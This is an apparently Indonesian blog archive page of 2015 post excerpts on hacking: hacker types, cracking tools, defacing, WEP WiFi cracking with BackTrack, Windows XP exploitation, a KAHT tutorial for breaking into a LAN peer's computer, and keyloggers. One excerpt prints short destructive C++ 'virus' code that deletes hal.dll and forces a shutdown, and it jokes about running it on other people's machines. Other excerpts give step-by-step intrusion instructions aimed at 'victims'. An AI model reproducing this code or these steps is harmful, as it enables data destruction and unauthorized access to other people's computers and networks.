Postingan

Menampilkan postingan dari September, 2015

Mengenal Hacker, Phreaker, Cracker dan lainnya

Pengertian Hacker, Phreaker, Cracker, Scammer, Defacer, Script kiddies, Hacker wannabe, Newbie Spammer, Junker, flammer. A. Hacker. adalah orang yang mempelajari, menganalisis, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan. Software apa saja yang sering digunakan hacker? berikut ini adalah beberapa software atau aplikasi yang sering digunakan hacker dalam melakukan pekerjaannya. hacker itu dibagi menjadi 2 jenis:  White Hat Hacker: adalah mengaacu kepada hacker yang secara etis menunjukkan kelemahan dalam sebuah sistem computer. Juga dikenal sebagai “good hacker”  Black Hat Hacker: adalah seseorang yang menerobos masuk ke dalam komputer, biasanya dengan memperoleh akses ke kontrol administratif. Software hacker yang bisa Anda pelajari dan tidak digunakan untuk melakukan sesuatu yang tergolong ke dalam tindakan kriminal. 1. Spytech Spy Agen: Tool ini merupakan sebuah aplikasi mata-mata

Aplikasi yang digunakan Cracker

Akan selalu menarik jika membicarakan tentang cracker, baik mengenai definisinya atau tindak tanduk seorang cracker. Cracker adalah penyusup yang sengaja masuk pada jaringan komputer milik orang lain secara ilegal dan “mengacak-ngacak” dokumen didalamnya. Pernahkah anda berpikir bagaimana seorang cracker bisa melakukan skenario kejahatanya, pernahkah anda berpikir bagaimana seorang cracker bisa membobol security perusahaan. Hal itu tak lain karna seorang cracker mempunyai se njata khusus baik yang dapat diunduh secara gratis di internet atau bisa juga ia menciptakan senjata-nya sendiri (Tools). Think and action like cracker, mungkin kalimat ini adalah hal yang paling logis jika kita ingin menghentikan sekenario kejahatan seorang cracker. Setidaknya kita memiliki pola yang sama dengan seorang cracker, dan tentunya aplikasi aplikasi yang biasa di gunakan oleh seorang cracker tersebut. Setidaknya kita bisa mempelajari bagaimana aplikasi tersebut bekerja. Berikut ini saya

Pengertian Defacing

APA ITU DEFACING? Defacing adalah merupakan bagian dari kegiatan hacking web atau program application, yang menfokuskan target operasi pada perubahan tampilan dan/atau konfigurasi fisik dari web atau program aplikasi tanpa melalui source code program tersebut. Sedangkan deface itu sendiri adalah hasil akhir dari kegiatan cracking dan sejenisnya – tekniknya adalah dengan mbaca source codenya (ini khusus untuk konteks web hacking), trus ngganti image (misalnya), editing html tag dkk, dan lain-lain. JAHIL, sebuah kondisi ambiguitas…. Konon di suatu tempat yang (katanya) memiliki nilai-nilai luhur norma sosial (Kayaknya Indonesia banget deh …..), mereka memiliki semacam kode etik pada setiap sendi-sendi kehidupan sosialnya dan (katanya pula) mereka sangat menjunjung tinggi nilai-nilai tersebut, termasuk dalam kasus perbuatan “JAHIL”. Sebuah perilaku yang memiliki banyak kondisi. Kondisi dimana perbuatan jahil itu dapat ditolerir dan juga kondisi dimana perbuatan jahil itu

Cara Nge hack Password WIFI

cara untuk memecahkan Wifi atau sandi nirkabel hanya dalam 10 sampai 15 menit. Hari ini saya akan menjelaskan Cara Hack atau Crack Wifi Password. Hari hack akan didasarkan pada retak password enkripsi WEP. Jadi orang mengencangkan ikat pinggang Anda untuk baru hack dan mari kita mulai hack wifi. Saya juga memasukkan video di bawah posting. Jadi anda bisa membaca dan menonton .... LANGKAH UNTUK HACK PASSWORD ATAU WIRELESS WIFI 1. Dapatkan CD Backtrack-Linux . Backtrack Linux Live CD (Linux terbaik tersedia untuk hacker dengan lebih dari 2000 hacking tools built-in). Download Backtrack Linux Live CD dari sini: http://www.backtrack-linux.org/downloads/ 2. SCAN UNTUK MENDAPATKAN KORBAN Dapatkan korban serangan itu adalah password yang ingin Anda hack atau crack. Sekarang Masukkan Backtrack Linux CD ke dalam drive CD Anda dan memulainya. Setelah itu klik mulai pada kotak hitam di sudut kiri bawah untuk memuat sebuah "Konsole". Sekarang Anda harus mulai kartu Wi

Membuat Virus Dengan Aplikasi c++

BUAT VIRUS Virus sederhana tapi berbahaya 1.virus ini dibuat pake c++,jadi siapkan tool c++ (ex:dev c portable n sejeniznya) 2.seterusnya copykan script ini Code: #include #include using namespace std; int main(int argc, char *argv[]) { std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME system("shutdown -s -r"); system("PAUSE"); return EXIT_SUCCESS; } 3.program/ato virus ini bakal ngapuz filoe c: jadi jangan di coba di ecsekusi sembarangan 4.Don't try this at your komputer(di komputer orang boleh).hehe 6.teknik yang lebih adavance lagi 7.copy paste lagi script di bawah ne, Code: #include #include using namespace std; int main(int argc, char *argv[]) { std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME system("shutdown -s -r"); system("PAUSE"); return EXIT_SUCCESS; } 8.perbdaan kode yg pertaman ini terlatak pada proses pencarian direktori system secara otomatis(jdi klo yg pertama klo

Cara Hacker Menebak Password kita

Jaman sekarang yang namanya hacker atau cracker semakin kreatif, dengan berbagai cara mereka berusaha menembus email Anda, friendster, rekening online, web site, bahkan blog Anda tidak mau kan, kalau suatu saat profile Anda di friendster diubah oleh orang? Atau web site Anda tiba-tiba di ganti tampilannya oleh hacker / cracker ? Salah satu cara hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita. Cara hacker menebak password kita antara lain dengan: 1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter. 2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter. 3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.

Teknik eksploitasi windows XP

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP,pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nyaWindows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt diecho zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal smile emotikon , sedangkan kali iniyang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32untuk dapat menaruh batch file di folder start up nya sang Admin tersayang,sehingga apabila dipaksakan ?Access Denied? adalah jawabannya. Apa akibatnyajika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buatorang seneng... heuheueehuhuehuee ! Jawab sendiri dah ...Tekhnik pertama :Yang kita butuhkan sekarang adalah :Petter Recovery Password yang bisa di download dari situsnya langsunghttp://home.eunet.no/~pnordahl/

Mengamankan Jaringan Komputer agar tidak dibajak oleh hacker

Think and act like hackers , pepatah ini berguna bagi Anda yang saat ini bergelut di bidang keamanan jaringan atau Anda ingin memerangi hackers. Kali ini, kami berikan beberapa tools wajib yang biasa digunakan hackers di seluruh dunia. Akan selalu menarik jika kita membicarakan tentang keamanan sebuah komputer,baik yang terhubung ke Internet, jaringan kantor, ataupun computer desktop stand-alone yang biasa digunakan oleh user rumahan. Ulah hacker yang tidak bertanggung jawab sering mengancam keamanan data-data yang ada, baik itu hanya sekedar iseng saja,sebagai bahan percobaan, ataupun yang sudah mengarah ke tindak kejahatan lebih lanjut, seperti membobol rahasia perusahaan, account orang tertentu, dan sebagainya. Untuk itu, tentu saja seorang hacker dibantu dengan beberapa tools aplikasi yang tersedia gratis di Internet, dan bisa juga ia menciptakan tools-nya sendiri. Jika Anda ingin menghentikan scenario kejahatan yang akan dilakukan hacker, setidaknya harus memiliki p

Pengertian Backtrack

APA ITU BACKTRACK Bagi sebagian orang mungkin sudah ada yang tahu, dan juga bagi sebagian orang yang lain mungkin ada yang tidak. Pasti anda pernah mendengar nama nama seperti RedHat, Ubuntu, Fedora, OpenSuse, LinuxMint dan sebagainya. Backtrack merupakan salah satu dari distro linux namun bukan distro umum yang dikenal selama ini. Jika distro linux seperti nama nama diatas (RedHat, Ubuntu, dkk) itu kita ibaratkan sebagai dokter umum, maka backtrack ini adalah dokter spesialis. Kok Dokter spesialis ? Apa yang menyebabkan Backtrack itu spesial dibanding yang lainnya? Iya distro linux yang satu ini memang dirancang untuk masalah security, dan untuk digunakan oleh para security profesional (dan juga hacker). Didalam Backtrack itu sudah disiapkan ratusan software security yang sudah siap untuk digunakan. Jadi keuntungannya anda tidak perlu lagi mendownloadnya satu persatu, menginstallnya satu persatu, dan mengalamai berbagai kesulitan pada saat instalasinya. Jumlah softw

Tutorial KAHT

TUTORIAL KAHT Anda ingin masuk dikomputer teman anda dalam sebuah LAN dan bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file dll. Pertama-tama anda harus tahu Dua program penting yang harus di download yaitu : 1. internet Maniac (Internet Maniac.exe), Berfungsi untuk mengetahui IP Address client melalui computer name / hostname KaHT (KaHt.exe). 2. Download program hacker KaHT, Berfungsi sebagai program untuk menerobos ke computer server atau client. Periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. § Masuk ke Start Lalu Search, § Pilih for Files or Folder, § Pilih computers or people, § Pilih A computer on the Network. Klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Cara Alternatif · Klik My Network Place · Network Neighboure · Setelah mendapatkan sasaran computer yang mau di diremote · Jalankan program Internet Maniac · Masuklah ke Host Lookup lalu · Ketikkan nam

Pengertian Keylogger

Keylogger merupakan salah satu software mata-mata yang sangat berguna yang memungkinkan Anda menangkap dan melihat seluruh aktivitas penekanan tombol yang terdapat pada keyboard. Salah satu Keylogger yang terkenal adalah Actual Spy Keylogger. Actual Spy Keylogger dilengkapi dengan antarmuka yang sudah dilindungi dengan sistem proteksi handal seperti password dan seluruh file-file log akan dienkripsi. Anda dapat langsung melihat laporan log dalam bentuk format HTML atau teks biasa. Dalam modus tersembunyi, aplikasi Actual Keylogger ini tetap dapat Anda lihat pada sistem operasi yang Anda gunakan. Aplikasi Actual Keylogger dapat Anda gunakan secara Gratis dan akan benar-benar membantu administrator dan pengguna PC rumahan. Berikut ini adalah beberapa fitur kunci dari Actual Spy Keylogger Terbaru : Mencatat dan menyimpan semua log penekanan tombol, yang bersifat case sensitive Sistem hanya dapat menunjukkan karakter tanpa memperlihatkan tombol yang ditekan oleh sistem seca

Pengertian Cybercrime

CyberCrime atau biasa disebut dengan kejahatan dunia maya merupakan istilah yang mengacu kepada aktivitas kejahatan dengan komputer atau jaringan komputer menjadi alat, sasaran atau tempat terjadinya kejahatan. Termasuk ke dalam kejahatan dunia maya antara lain adalah penipuan lelang secara online, pemalsuan cek, penipuan kartu kredit/carding, confidence fraud, penipuan identitas, pornografi anak, dll. Namun istilah ini juga digunakan untuk kegiatan kejahatan tradisional di mana komputer atau jaringan komputer digunakan untuk mempermudah atau memungkinkan kejahatan itu terjadi. Cybercrime memiliki karakteristik unik yaitu : 1. Ruang lingkup kejahatan 2. Sifat kejahatan 3. Pelaku kejahatan 4. Modus kejahatan 5. Jenis kerugian yang ditimbulkan, Apakah cyber crime bisa digolongkan sebagai kriminalitas? Iya, karena membuat tidak nyaman user lain, tidak membuat nyaman pembuat program, tidak adanya izin tertentu sehingga dapat merugikan berbagai pihak, contohnya crakking, hacking,